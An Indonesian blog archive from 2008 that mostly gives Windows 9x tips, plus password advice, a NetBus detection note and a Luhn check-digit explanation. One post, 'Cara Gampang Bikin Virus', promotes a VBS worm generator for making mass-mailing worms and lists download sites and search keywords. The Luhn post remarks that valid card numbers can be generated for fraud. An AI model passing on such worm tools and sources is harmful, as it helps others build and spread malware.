Shortcut yang terletak pada Start - Programs sebenarnya tidak hanya mempunyai satu macam icon saja. Misalnya icon untuk MS Word. Mungkin Anda hanya mengenal icon bergambar W saja. Sebenarnya MS Word 97 mempunyai delapan macam icon lainnya yang dapat Anda gunakan sebagai alternatif. Untuk menggantinya caranya sebagai berikut :

Klik Start - Program, dan arahkan mouse ke Microsoft Word.
Klik kanan pada tulisan Microsoft Word, klik Properties.
Pindah ke tab Shortcut.
Tekan tombol Change Icon.
Pilih icon yang Anda inginkan dan klik OK.
Tekan Aplly dan terakhir Close.

Mengganti background pada Windows Explorer

2008-12-12T20:55:00.000+07:00

Supaya tampilan Windows Explorer maupun folder Anda lebih menarik, Anda bisa menambahkan dengan gambar favorit Anda sebagai background. Ada pun caranya adalah sebagai berikut :

Buka Windows Explorer.
Klik menu View, dan pilih Customize this folder.
Dari tiga pilihan yang ada, pilih Create a background picture, klik Next.
Tekan tombol browse dan arahkan ke tempat Anda menyimpan gambar yang akan digunakan sebagai background.
Kalau sudah ketemu klik Open, dan Next.
Terakhir klik Finish.

Mengenal perintah-perintah dasar DOS

2008-12-12T20:54:00.001+07:00

Mengenal ekstensi file

2008-12-12T20:52:00.001+07:00

Saat Anda mengklik kanan pad file dan memilih Properties, pada bagian MS-DOS name pasti ada tulisan tiga huruf sesudah titik. Itulah yang dinamakan ekstensi file. Fungsinya adalah untuk mengetahui atau membedakan jenis file. Nah, yang kami tuliskan di sini adalah beberapa jenis file yang paling umum. Untuk mengetahui ekstensi file lainnya Anda bisa membuka Windows Explorer, lalu pilih menu View - Folder Options. Pindah ke tab Files Types. Di sana terdapat puluhan dan mungkin ratusan ekstensi file. Semakin banyak Anda menginstall aplikasi maka daftar ekstensi file yang ada akan semakin panjang. Di antara beberapa ekstensi file itu adalah sebagai

Mengatasi masalah pada booting Windows

2008-12-12T20:51:00.001+07:00

Banyak masalah yang terjadi pada waktu booting. Untuk mengatasinya Anda perlu tahu apakah masalah itu terjadi sebelum komputer menampilkan Windows splash screen. Bila ya kemungkinan besar terjadi masalah pada hardware atau BIOS.

Bila windows tidak menampilkan desktop screen

Mungkin Anda pernah mengalami masalah seperti ini. Kompoter Anda sudah menampilkan splash screen tapi ditunggu sampai lama windows tidak juga menampilkan desktop screen. Untuk mengatasinya Anda perlu booting pada Safe Mode. Caranya, pada saat komputer selesai melakukan "proses" BIOS tekanlah tombol [Ctrl] sampai muncul berbagai menu pilihan. Setelah itu pilihlah Safe Mode. Jika Anda termasuk beruntung maka Anda bisa masuk windows sampai desktop screen. Klik kanan pada My Computer, pilih Properties. Pillih pada tab Device Manager. Bila Anda melihat tanda seru pada salah satu Device yang ada berarti terjadi "konfilk" device. Untuk itu Anda perlu men-disable hardware yang mengalami masalah. Setelah itu Anda bisa restart.

Menampilkan jam dalam format Indonesia

2008-12-12T20:50:00.002+07:00

Lihatlah pada pojok kiri komputer Anda, pastilah terdapat tampilan jam yang menunjukkan waktu pada saat ini. Tampilan waktu tersebut tentunya sangat bermanfaat bagi Anda yang sangat menghargai waktu, apalagi bagi Anda yang tidak punya jam :-). Tapi seringkali tampilan tersebut tidak sesuai dengan kebiasaan kita (baca : orang Indonesia) yang menganut sistem 24 jam. Sehingga tampilan jam selalu menunjukkan antara angka 1 sampai 12 (hanya beda am dan pm).

Sebenarnya Anda bisa mengganti tampilan jam tersebut sehingga lebih sesuai dengan format di Indonesia, misalnya 13.00 untuk menunjukkan jam 1.00 siang, 23.00 untuk jam 11 malam. Caranya sebagai berikut :
1. Buka Control Panel.
2. Klik icon Regional Settings.
3. Pada tab Regional Settings, pilih negara Indonesia.
4. Klik Apply, terus OK.
5. Terakhir restart komputer.

Taskbar

2008-12-12T20:50:00.001+07:00

Memindah letak taskbar

Secara default taskbar terletak pada kiri bawah. Sebenarnya Anda bisa mengganti posisi taskbar tersebut. Caranya klik dan tahan pada sembarang tempat pada taskbar. Lalu klik mouse dan geser Anda ke atas, kanan atau kiri tergantung taskbar tersebut mau diletakkan di mana.

Memperbesar ukuran taskbar

Secara default taskbar hanya dapat menampung satu baris icon dan taskbar button. Untuk memperbesar ukuran taskbar sehingga dapat menampung lebih banyak taskbar button, arahkan cursor mouse ke bagian pinggir dari taskbar lalu drag ke atas

Lindungi data penting Anda !

2008-12-12T20:48:00.002+07:00

Beragam alasan yang bisa dikemukakan mengapa melindungi data menjadi satu hal yang sangat penting, diantaranya adalah :

Melindungi supaya tidak ada orang lain yang bisa membuka file data Anda.
Melindungi data atau dokumen supaya orang lain hanya bisa melihat isi dokumen Anda, tidak bisa menambah atau pun memodifikasi data.
Melindungi file executable (file *.exe) dari serangan virus.
Mencegah orang lain menjalankan file executable. Dalam aplikasinya Anda bisa mencegah orang lain menjalankan game yang ada di komputer Anda atau mencegah orang lain menjalankan program yang cukup riskan untuk dijalankan oleh sembarang orang.
Mencegah orang lain membuat file atau folder baru pada folder yang telah Anda tentukan.
Menyembunyikan data Anda sehingga orang lain tidak dapat melihatnya walaupun setting pada Folder Options - View berada pada Show All Files.

Maka beruntunglah -- dalam hal keamanan data -- orang yang menggunakan sistem operasi Linux, Windows NT dan Windows 2000 karena ketiga sistem operasi tersebut mempunyai tingkat keamanan yang cukup tinggi. Bagaimana halnya dengan sistem operasi seperti Windows 95, 98 dan Windows ME ?

Tidak dapat dipungkiri sebagian besar pemakai perseorangan mengandalkan Win 9x dan ME untuk sistem operasinya. Mungkin termasuk Anda. Lalu bagaimanakah cara melindungi data penting Anda tanpa harus mengganti sistem operasi ?

Cara yang paling mudah adalah dengan menggunakan program proteksi yang banyak beredar di internet. Salah satunya adalah File Protector. Ada beberapa macam proteksi yang ditawarkan oleh software berukuran sekitar 80 Kb ini, yaitu :

Read Only : Mencegah terjadinya overwrite, modifikasi, append (penambahan data), mencegah rename (disable rename), dan mencegah penghapusan (disable delete) pada file atau directory yang diproteksi.
No Access :Sama dengan feature Read Only dengan beberapa tambahan untuk mencegah data Anda dibuka (disable open), dibaca (disable read), dan dieksekusi/dijalankan (disable execute).
Hidden :Memungkinkan Anda untuk menyembunyikan file atau directory.
Protect from virus : Mencegah dari serangan virus

Dengan interface yang sederhana, Anda dapat melakukan berbagai setting pada File Protector dengan sangat mudah bahkan untuk seorang pemula sekalipun.

Jika Anda tertarik menggunakannya silakan download programnya di http://mikkoaj.hypermart.net/. Setelah itu ekstrak file yang masih berbentuk ZIP tersebut ke sembarang folder. Untuk memulai proses install jalankan file install.exe. Setelah proses install selesai maka reboot komputer Anda.

catatan :
Tidak seperti layaknya program lain, program File Protector ini tidak membuat shortcut pada Start Menu - Programs.

Lebih memahami fungsi Refresh

2008-12-12T20:48:00.001+07:00

Anda tentunya sudah tidak asing lagi dengan Refresh. Misalnya kalau Anda mengklik kanan pada Desktop maka akan muncul menu Refresh. Juga pada saat Anda berada di Windows Explorer. Tapi tahukah Anda apa sesungguhnya fungsi Refresh tersebut. Refresh biasa digunakan untuk memperbaharui "tampilan" setelah terjadi suatu perubahan. Untuk lebih memahaminya, coba ikuti langkah berikut ini.

Pertama, buat folder baru pada Desktop dengan cara klik kanan, pilih New - Folder (Tapi sebelumnya Anda harus menonaktifkan Show All Files. Caranya dari Windows Eplorer, klik menu View - Folder Options. Pindah ke tab View. Pilih Do not show hidden or system files. Klik OK).
Setelah Anda membuat Folder baru, klik kanan folder tersebut lalu pilih Properties. Lalu beri tanda centang atau check pada bagian Hidden. Klik OK.

Sekarang Anda melihat bahwa Folder tersebut masih nampak pada Desktop walaupun Anda telah mengganti atribut folder tersebut menjadi hidden (tersembunyi). Nah sekarang klik kanan pada desktop, pilih Refresh. Atau bisa juga dengan menekan tombol F5. Sekarang folder tersebut sudah tidak nampak lagi pada Desktop.

Nah, sekarang tahu kan fungsi Refresh ?

Kerusakan pada file win.com

2008-12-12T20:47:00.000+07:00

Saat booting windows 95/98 komputer Anda menampilkan pesan:

The following file is missing or corrupted: Win.com
The following file is missing or corrupted: Win.com
Program too big to fit in memory Cannot find Win.com, unable to continue loading Windows
Program too large

Penyebab :

Hal ini bisa terjadi bila file win.com mengalami kerusakan. Ukuran untuk file win.com yang tepat adalah sebagai berikut :

Windows 95: 22,679 bytes
Windows 95 OSR 2 24,503 bytes
Windows 98: 24,791 bytes

Solusi :

Untuk mengatasinya, Anda harus membuat file win.com baru dengan cara mengekstrak file win.cnf dari CD Windows. Langkah komplitnya sebagai berikut :

Ekstrak file win.cnf dari CD Windows ke folder C:\Windows. Adapun letak file win.cnf adalah : Pada Windows 95 terletak pada file Win95_03.cab Pada Windows 98 terletak pada file Win98_28.cab
Setelah diekstrak kemudian gantilah nama win.cnf menjadi win.com. Caranya : ren c:\windows\win.cnf c:\windows\win.com
Terakhir restartlah komputer Anda

Internet Gratis

2008-12-12T20:46:00.000+07:00

Barangkali susah di percaya - sesuatu yang hi-tech seperti Internet bisa diberikan percuma. Tapi kalau kita jeli dan memperhatikan sekeliling kita sebetulnya ada banyak hal yang kita bisa peroleh secara gratisan. Perhatikan televisi siaran swasta, radio siaran, beberapa majalah profesional pun dibagikan gratis, kadang-kadang pager, kadang-kadang handphone, kadang-kadang koran, flyer dari berbagai supermarket banyak sekali media yang dapat kita peroleh secara gratis.

Internet gratis juga bukan sesuatu yang mustahil. Coba perhatikan - sekarang banyak akses e-mail berbasis Web yang diberikan secara gratis, contoh yang sering digunakan seperti hotmail.com, yahoo.com, usa.net, qsl.net dan masih banyak lagi orang yang memberikan servis e-mail gratis. Web juga tidak kalah serunya ada banyak tempat meletakkan web gratisan - seperti geocities.com.

Baiklah mungkin kita di Indonesia biasa dengan e-mail dan Web gratis, bagaimana dengan ISP atau akses ke Internet - sekarang semua harus membayar ke ISP atau menggunakan telkomnet instan. Mungkinkah akses ke ISP jadi gratis? Kalau di dunia sekarang - di Inggris sudah ada akses Internet gratis, FreeNet di Amerika Serikat telah memberikan akses Internet secara gratis sejak tahun 80-an, di Singapore juga tampaknya telah terbentuk ISP yang bisa memberikan akses gratisan.

Kita bisa saja berargumentasi - lha itu kan negara maju. Di Indonesia kalau kita perhatikan ada sesuatu juga yang bisa kita peroleh gratis dari akses Internet. Contoh nyata di Indonesia - sekarang ada Warung Internet yang memberikan soft-drink gratis bagi pengunjungnya … ini awal yang lumayan lah. Artinya bukan mustahil Internet semakin hari semakin murah.

Bagaimana ini semua bisa terjadi? Internet dari sisi informasi-nya tidak berbeda terlalu jauh dengan bisnis media sebetulnya - apakah itu media televisi, media radio, koran / surat kabar. RCTI, ANTV, SCTV, IndoSiar, KOMPAS, Republika, Rase FM, OZ FM semua media sebagian besar hidup-nya dari iklan & bukan dari biaya yang ambil pembaca / pendengar / pemirsa-nya. Semakin banyak pendengar / pembaca-nya dari golongan tertentu - maka semakin mungkin untuk memperoleh iklan yang di arahkan ke golongan pembaca / pemirsa tertentu tersebut.

Hal yang sama terjadi di Internet juga rupanya, semakin banyak orang berkumpul di suatu tempat virtual di Internet semakin mahal tempat tersebut sebagai ajang iklan. Perhatikan hotmail.com, yahoo.com - praktis semua tempat yang banyak di kunjungi orang menjadi tempat paling banyak di pasangi iklan-iklan. Kita bicara disini dalam orde juta-an manusia yang mengakses hotmail.com / yahoo.com. Bagaimana dengan Indonesia tampaknya sekarang yang menikmati pemasukan iklan dalam jumlah besar tidak banyak - minimal kompas.com & detik.com masing-masing berkisar antara seratusan juta / bulan hingga puluhan juta / bulan - semua dari iklan - yah lumayan buat balik modal.

Jadi strategi-nya adalah bagaimana caranya mengumpulkan sebanyak mungkin orang, sukur-sukur kita bisa tahu bagaimana profile orang yang berkumpul itu - nah massa yang berkumpul ini urusannya bisa menghasilkan duit atau bisa juga di arahkan ke kepentingan-kepentingan lain (bisa ekonomi maupun politik) untuk media yang mengumpulkan massa tersebut. Tinggal pandai-pandainya media yang mengumpulkan massa tersebut untuk menjual massa-nya ke penyandang dana yang akan diuntungkan oleh kumpulan massa tersebut.

Bagaimana cara mengumpulkan massa di Internet? Ada banyak cara mengumpulkan massa di Internet. Sebelum itu kita perlu menyimaki keistimewaan internet - yang sangat berbeda dengan media massa / media elektronik lainnya - internet memungkinkan interaksi yang dua arah dan dapat di customize sesuai dengan masing-masing orang. Koran, TV, media massa sifatnya lebih satu arah dan sukar sekali di customize untuk masing-masing pembaca. Nah seni-nya adalah bagaimana caranya kita mengeksplotasi kelebihan Internet yang sifatnya interaktif dua arah dan customize ini untuk mengumpulkan massa yang sebesar-besarnya.

Langkah yang konvensional adalah membuat protal (atau sederhananya pusat informasi) seperti Yahoo sehingga orang berkumpul. Langkah lain adalah mengeksploitasi kemampuan "real-time" internet dengan cara menyajikan berita-berita secepat mungkin hal ini dilakukan oleh kantor berita / surat kabar seperti CNN, detik.com. Tapi semua masih bersifat satu arah hanya mungkin bisa ditambah kemampuan customize.

Bayangkan kalau di tempat orang memperoleh berita / portal tersebut diberikan fasilitas diskusi yang sifatnya interaktif dan dibuat sekat-sekat untuk bidang / isu-isu tertentu � kira-kira seperti talk-show di TV / radio tapi ini di Internet. Tentunya akan lebih menarik lagi karena orang-orang yang tertarik dibidang / isu tertentu tersebut akan berkumpul setiap hari di situ .. hal ini akan menjadi kesempatan emas bagi penyedia layanan informasi / forum diskusi ini untuk menghasilkan devisa dari sponsorship dll.

Dengan cara-cara psikologi massa yang memanfaatkan semaksimal mungkin keuntungan internet yang sifatnya "real-time" dan "interaktif" maka massa dapat dikumpulkan dengan mudah sehingga dapat terjadi proses cross subsidi yang pada akhirnya dapat menguntungkan semua pihak � terutama pihak pengguna internet yang dapat memperoleh sebagian besar informasi yang dibutuhkan secara gratisan.

Tentunya khusus untuk Indonesia, rumusan di atas hanya berlaku jika jumlah pengguna internet yang ada cukup besar. Pendidikan & akses internet bagi pendidikan akan menjadi salah satu kunci yang paling menentukan dari semuanya.

Mendeteksi dan Menghilangkan Netbus

2008-12-12T20:45:00.000+07:00

Untuk mendeteksi keberadaan NetBus Anda bisa mengetikkan pada DOS Prompt :

c:\netstat -an | find "12345"
c:\telnet
Pada menu Connect pilih Remote Systems. Akan muncul kotak dialog. Isikan localhost pada Host Name dan 12345 pada Port. Klik Connect. Jika memang pada komputer tersebut terdapat NetBus maka pada telnet akan muncul tulisan NetBus 1.70.

Cara lain untuk mendeteksi dan menghilangkan keberadaan NetBus dan program-program semacamnya Anda bisa menggunakan Anti Virus dengan update terbaru.

Cara Gampang Bikin Virus

2008-12-12T20:42:00.001+07:00

Kamu pasti masih inget dengan virus worm yang sempat menghebohkan internet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

Situs yg menyediakan VBSWG :

http://www.virii.com.ar,
http://www.kvirii.com.ar,
http://vx.netlux.org/dat/tv07.shtml.

Atau gunakan search engine http://www.google.com dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya

Algoritma Cek Digit Pada Kartu Kredit

2008-12-12T20:34:00.003+07:00

Di dunia nyata tentunya Anda sudah mengetahui, atau setidaknya mendengar bagaimana kartu kredit telah diterima secara luas di masyarakat. Berbagai toko, dan penyedia layanan jasa telah menerima pembayaran dengan menggunakan kartu kredit. Saat ini di dunia maya (Internet), pembayaran dengan kartu kredit juga sudah mulai diterima secara luas. Berbagai kejahatan telah sering dilakukan dengan penggunaan kartu kredit ini, baik di dunia nyata maupun di dunia maya. Namun di artikel ini saya tidak akan membahas mengenai keamanan kartu kredit, saya hanya membahas suatu hal kecil yang disebut sebagai pengecekan digit pada kartu kredit. Hal ini memang cukup kecil, namun patut diketahui oleh semua orang.

Dalam proses pembayaran di Internet dengan menggunakan kartu kredit, ada suatu proses yang sangat diperlukan yaitu authentication, hal ini merupakan proses untuk membuktikan bahwa nomor kartu kredit yang dimasukkan adalah benar, dan yang memasukkan adalah orang yang berhak untuk menggunakan kartu itu. Hal ini tampaknya mudah dilakukan, sebuah program bisa langsung dihubungkan ke server bank dan bisa langsung diperiksa, tapi hal ini tentunya cukup menyita waktu, bagaimana jika nomor kartu yang dimasukkan ternyata salah ketik?, segala koneksi ke server bank, segala pencarian data dan lain-lainnya tentunya akan sia-sia.

Untuk (sedikit) memecahkan masalah di atas, nomor kartu kredit telah dirancang sedemikian rupa sehingga memungkinkan dilakukannya pengecekan awal sebelum sebuah nomor diperiksa melalui bank yang bersangkutan. Pengecekan ini adalah pengecekan kombinasi digit yang lazim dikenal dengan nama algoritma cek digit. Algoritma cek digit yang dipakai di kartu kredit adalah algoritma cek digit Luhn (Luhn check digit algorithm).

Algoritma Cek Digit Luhn

Algoritma cek digit merupakan suatu algoritma yang digunakan untuk mengecek validitas suatu angka berdasarkan digit-digit yang membentuknya. Salah satu aplikasi sangat umum yang kita temui dalam kehidupan sehari-hari adalah proses pemasukan data barang belanjaan yang kita beli di supermarket yang kecil (yang masih menggunakan input manual, tidak menggunakan bar code reader). Mungkin kadang-kadang Anda melihat kasir kadang-kadang salah memasukan data sehingga muncul sedikit pesan kesalahan dan kemudian dia mengetik ulang kembali kode barang yang tercantum di barang. Pernahkah Anda berpikir bagaimana komputer bisa tahu bahwa nomor tersebut salah?. Jawabnya adalah dengan menggunakan cek digit, biasanya digit terakhir dari kode barang itu merupakan hasil operasi matematis terhadap digit-digit sebelumnya, sehingga jika ada kesalahan input langsung terdeteksi, misalnya kode barang adalah 98876768532 tetapi yang dimasukkan adalah 98876768533 komputer akan menganggap data ini salah. Andaikan cek digit ini tidak ada, dan setiap kode barang dibuat urut, komputer akan menganggap benar semua data yang dimasukkan, mungkin akan tercantum Anda membeli sebatang coklat Silver Queen padahal yang Anda beli adalah coklat merek lain.

Untuk algoritma cek digit Luhn, sebenarnya saya kurang mengerti sejarah cek digit dengan algoritma ini, tapi algoritma ini dipakai oleh semua bank besar yang mengeluarkan kartu kredit (Visa, MasterCard, Amex, Novus, dan mungkin masih banyak yang lain). Algoritma cek digit ini juga dipakai di kartu-kartu ATM, setidaknya yang sudah saya perhatikan kartu ATM Bank BNI dan BII sepertinya bank yang lain juga menggunakan cara ini. Ketika pihak Telkom memperkenalkan TeCC (Telkom Calling Card), algoritma ini juga dipakai.

Metode cek digit ini sebenarnya sederhana, hanya perlu tiga langkah untuk membuktikan apakah suatu kartu memenuhi algoritma cek digit Luhn, untuk kartu dengan jumlah digit genap (mis Visa [16 digit], MasterCard[16 digit], dan Novus[16 digit]) caranya sebagai berikut :

untuk setiap digit pada posisi yang ganjil (saya menghitung digit mulai dari kiri dengan yang paling kiri adalah digit ke-1), kalikan nilainya dengan dua, jika hasilnya lebih dari 9, kurangi hasilnya dengan 9. Jumlahkan semua angka yang telah didapat itu.
untuk setiap digit pada posisi genap, jumlahkan semua nilainya dan tambahkan hasilnya dengan hasil langkah pertama.
jika hasil pada langkah kedua habis dibagi 10, berarti nomor kartu tersebut sah.

Mudah bukan?, untuk kartu dengan jumlah digit yang ganjil (misalnya Visa [13 digit], Amex [15 digit]) caranya sama, hanya saja pada langkah pertama yang dikalikan adalah digit pada posisi genap, dan pada langkah kedua yang dijumlahkan adalah digit pada posisi ganjil.

Algoritma Cek Digit Luhn

Contoh :
Jika saya punya kartu dengan nomor :

7889-8594-5435-5413

dan saya ingin tahu apakah angka ini benar-benar nomor kartu kredit yang sah atau tidak saya bisa melakukan langkah sbb (perhatikan jumlah digit ada 16):

1) mengalikan semua angka pada digit ganjil dengan dua dan mengurangkan hasilnya dengan 9 jika lebih dari 9, lalu dijumlahkan

inilah digit-digit pada posisi ganjil

D01 = 7
D03 = 8
D05 = 8
D07 = 9
D09 = 5
D11 = 3
D13 = 5
D15 = 1

Jika dilakukan operasi kali dua dan kurangi 9 (jika lebih dari 9) didapat

D01' = 7 x 2 = 14, karena lebih dari maka hasilnya dikurangi 9 D02' = 14 - 9 = 5
D03' = 8 x 2 = 16, karena lebih dari maka hasilnya dikurangi 9 D02' = 16 - 9 = 7
D05' = 8 x 2 = 16, karena lebih dari maka hasilnya dikurangi 9 D02' = 16 - 9 = 7
D07' = 9 x 2 = 18, karena lebih dari maka hasilnya dikurangi 9 D02' = 18 - 9 = 9
D09' = 5 x 2 = 10, karena lebih dari maka hasilnya dikurangi 9 D02' = 10 - 9 = 1
D11' = 3 x 2 = 6 , kurang dari 9 jadi tetap 6
D13' = 5 x 2 = 10, karena lebih dari maka hasilnya dikurangi 9 D02' = 10 - 9 = 1
D15' = 1 x 2 = 2 , kurang dari 9 jadi tetap 2

Jumlah D01' + D03' + D05' + D07' + D09' + D11' + D13' + D15' = 5 + 7 + 7 + 9 + 1 + 6 + 1 + 2 = 38

2) Menjumlahkan semua digit pada posisi genap

D02 = 8
D04 = 9
D06 = 5
D08 = 4
D10 = 4
D12 = 5
D14 = 4
D16 = 3

Jumlah = 8 + 9 + 5 + 4 + 4 + 5 + 4 + 3 = 42

Bila hasil langkah 1 dan langkah 2 dijumlahkan didapat 38 + 42 = 80, karena 80 habis dibagi 10 maka nomor tersebut sah sebagai nomor kartu kredit.

Sudah jelas kan?, ternyata algoritma cek digit pada kartu kredit sangat mudah dilakukan Anda pun bisa menghasilkan nomor-nomor yang sah sebagai nomor kartu kredit dengan menggunakan program, dan katanya dulu ini bisa dipakai untuk melakukan credit card fraud saya sendiri masih kurang mengerti dengan caranya karena menurut saya sekarang ini pemeriksaan sudah jauh lebih ketat dan hampir tidak mungkin seseorang lolos dengan hanya berbekal nomor yang sah saja tanpa expiration date dan nama pemiliknya.

TIPS MERAWAT DAN OPTIMASI PC

2008-11-24T21:55:00.006+07:00

PENGAMANAN DATA

2008-11-24T21:50:00.001+07:00

Tidak selamanya Anda berhadapan dengan hacker, mungkin yang Anda takutkan cuma anak Anda tanpa sengaja menghapus dokumen penting Anda atau bermain-main dengan gambar yang Anda miliki, atau Anda punya koleksi gambar-gambar yang akan membuat Anda menjadi malu jika ketahuan orang lain.

Untuk masalah di atas ada beberapa hal yang bisa dilakukan.

Yang Pertama buatlah sebuah direktori khusus di mana anda akan meletakkan file-file Anda, pindahkan file-file penting Anda ke direktori itu.

Yang Kedua buatlah attribut direktori itu menjadi hidden, system dan read only, untuk semua file di dalamnya lakukan hal yang sama, gunakan program ATTRIB atau semacamnya.

Yang ketiga hanya bagi Anda yang menggunakan sistem operasi Windows 95/98, jangan membeli program yang akan menghilangkan semua peringatan ketika Anda menghapus file apa saja, Gunakan shell explorer (Default windows 95/980 kecuali Anda punya shell yang jauh lebih baik. Jalankan explorer (bagi Anda yang memakai explorer sebagai shellnya) kemudian pilih menu view options pada tab View pilihlah hide file of these types dan klik OK. Anda juga bisa mengganti ekstension file Anda dengan daftar yang terpampang pada langkah di atas sehingga file Anda tidak akan ditampilkan.

Cara ini memang cukup aman, orang tidak akan bisa dengan tidak sengaja menghapus file-file tersebut. Namun file-file tersebut bisa dengan sengaja di ubah atau dihapus. Jadi pengamanan di tingkat ini hanya untuk menghindari ketidaksengajaan.

Hal-hal lain yang perlu diperhatikan antara lain :

1. Ubahlah nama file program yang berbahaya supaya tidak bisa dijalankan misalnya file FORMAT.EXE dan FDISK.EXE. Beberapa pemula suka mencoba-coba program-program, termasuk program yang berbahaya ini.

2. Buatlah cadangan data untuk data yang memang benar-benar penting.

3. Ajarkan kepada pemakai komputer baru langkah-langkah apa yang boleh dan yang tidak boleh diambil dalam mengoperasikan komputer.

4. Install Anti Virus yang up to date, carilah antivirus yang bisa secara otomatis bekerja di background dan bisa memonitor semua jenis virus termasuk virus dokumen.

Secara umum keempat langkah di atas sudah cukup baik untuk mencegah kesalahan karena ketidaksengajaan. Anda bisa menambahkan sendiri langkah-langkah yang dianggap perlu.

PENGAMANAN DGN PASSWORD

2008-11-24T21:45:00.002+07:00

Password sangat penting untuk mengamankan komputer Anda oleh karena itu Anda harus mengetahui cara membuat password yang baik. Walaupun program yang Anda gunakan sangat canggih, data Anda bisa saja dibongkar jika seseorang mengetahui password Anda. Beberapa teknik yang diajarkan di sini berlaku juga untuk password non komputer yang Anda miliki (ATM, TeCC, dan lain-lain)

Mungkin Anda sudah sering mendengar bagaimana membuat password yang baik, namun biasanya tidak pernah diberi penjelasan mengapa nah sekarang akan saya jelaskan:

1. Jangan pernah memakai kata yang umum yang ada di kamus, apalagi kamus bahasa Inggris. Kenapa ?, para hacker kadang menggunakan kamus untuk menebak password Anda dengan program, cara ini dikenal dengan dictionary password cracking/dictionary password attack

2. Gunakan kombinasi angka dan huruf . Beberapa program menggunakan brute force cracking/brute force attack maksudnya program akan mencoba semua kombinasi aa, ab , ac dst sampai passwordnya ketemu, nah untuk melakukan ini diperlukan waktu yang sangat lama, oleh karena itu biasanya beberapa program di set hanya untuk mencari password berupa huruf saja. Sebagai perbandingan coba bandingkan berapa kombinasi yang harus dicari jika menggunakan huruf saja dan kombinasi yang harus dicari bila menggunakan kombinasi huruf dan angka. Rumusnya : banyaknya kombinasi = banyak jenis huruf pangkat panjang password. Untuk password yang memakai huruf saja anggap jenis hurufnya ada 52 (A-Z dan a-z) dan untuk yang memakai huruf dan angka jenis hurufnya ada 62 (A-Z, a-z dan 0..9).

3. Password minimal 5 karakter, kurang dari itu akan mudah sekali ditebak.

4. Gantilah password Anda secara periodik.

5. Jangan gunakan password yang sama untuk berbagai hal. Jika Anda seorang system administrator jangan gunakan password SUPERVISOR anda sebagai password Screen Saver. Mungkin orang akan sulit menebak password supervisor, tapi password screen saver mudah sekali didekripsi.

6. Jangan gunakan tanggal lahir Anda atau keluarga Anda, jangan gunakan nomor telepon Anda atau nomor plat mobil Anda sebagai password (berlaku juga untuk password ATM). Ingat musuh Anda adalah orang dekat Anda yang mungkin tahu itu semua.

7. Jangan beritahukan password Anda kepada siapapun, termasuk kekasih Anda.

8. Jika ada yang menelepon Anda dan mengatakan bahwa dia perlu password ATM Anda atau password apa saja, JANGAN berikan apapun alasannya (biasanya alasannya kesalahan komputer atau ada pemeriksaan bahwa kartu ATM Anda telah disalahgunakan). Walaupun yang menelpon mengaku dari Bank atau dari Polisi. Hubungi Customer Service Bank itu dan tanyakan kebijakkan bank mengenai masalah itu, karena bank tidak pernah menanyakan hal-hal semacam itu. Jika yang menelpon polisi tanyakan nama, pos tempatnya bekerja dan nomor di kartunya. Verifikasikan hal ini ke kantor polisi yang bersangkutan jika Anda ragu.

9. Passwordnya harus mudah diingat, karena kelalaian Anda bisa menimbulkan masalah. Untuk ini Anda bisa menggunakan kombinasi nama dan nomor telepon orang yang Anda sukai yang TIDAK diketahui siapapun. Atau gunakan kombinasi yang hanya Anda sendiri yang tahu.

10. Untuk password email gratis di internet biasanya Anda akan diminta memasukkan hint question ketika Anda mendaftar. Guna hint question ini jika anda lupa password Anda, mereka akan menanyakan pertanyaan di hint question yang sangat mudah dan mereka akan memberi tahu Anda password Anda. Jika Anda yakin akan selalu ingat password Anda, jangan isi pilihan hint question. Jika Anda takut lupa pilihlah pertanyaan yang agak sulit seperti what is your mother's maiden name? dan jangan pertanyaan seperti di mana kamu lahir atau yang lainnya yang sederhana.

Banyak sekali orang yang ketahuan passwordnya hanya karena hal sepele ini. Menghapus File Jika Anda berniat menghapus file untuk menghapus jejak jangan gunakan perintah del./erase biasa, gunakan program khusus karena sebenarnya perintah del /erase tidak menghapus data Anda. Data tersebut masih bisa dikembalikan dengan program Unerase.

TIPS PEMELIHARAAN KOMPUTER

2008-11-24T21:42:00.000+07:00

1. Update anti-virus Anti-virus HARUS rutin di-update, agar dapat selalu menangkal virus-virus baru yang terus bermunculan setiap hari.
2. Kunjungi secara rutin situs pembuat antivirus yang digunakan. Juga dengan berhenti menggunakan Microsoft Outlook, maka Anda akan selamat dari berbagai virus yang ada.
3. Gunakan software lainnya seperti Eudora (http://www.eudora.com) atau Pegasus Mail (http://www.pmail.com)
4. Antivirus yang pada dasarnya relatif sama, yang penting anda melakukan update secara rutin seperti diterangkan di atas.
5. Selain antivirus komersial tersedia juga anti-virus yang gratis dan cukup baik antara lain Grisoft (http://www.grisoft.com) dan Avast! 4 Home (http://www.avast.com).
6. Secara fisik membersihkan komputer baik bagian luar maupun dalam casing dari debu dan benda-benda asing lainnya, yang dapat mempengaruhi kinerja dan fungsi perangkat komputer.
7. Memastikan sistem pendingin dan sirkulasi udara dalam casing berjalan dengan baik sehingga temperatur komputer bisa terjaga. Untuk komputer yang beroperasi 24 jam nonstop disarankan diletakkan di ruangan yang menggunakan pendingin (AC)
8. Defrag sebaiknya tidak terlalu sering dilakukan. Defrag biasanya hanya dilakukan jika proses baca-tulis ke harddisk terasa lambat, akan menginstal program besar, atau akan mengkopikan file ukuran besar ke harddisk Lagipula full defrag sangat intensif, sehingga jika sering-sering dilakukan maka akan memperpendek umur hard disk..
9. Hard disk saat ini sudah sangat kencang, sehingga data yang terfragmentasi biasanya tidak akan banyak memperlambat.
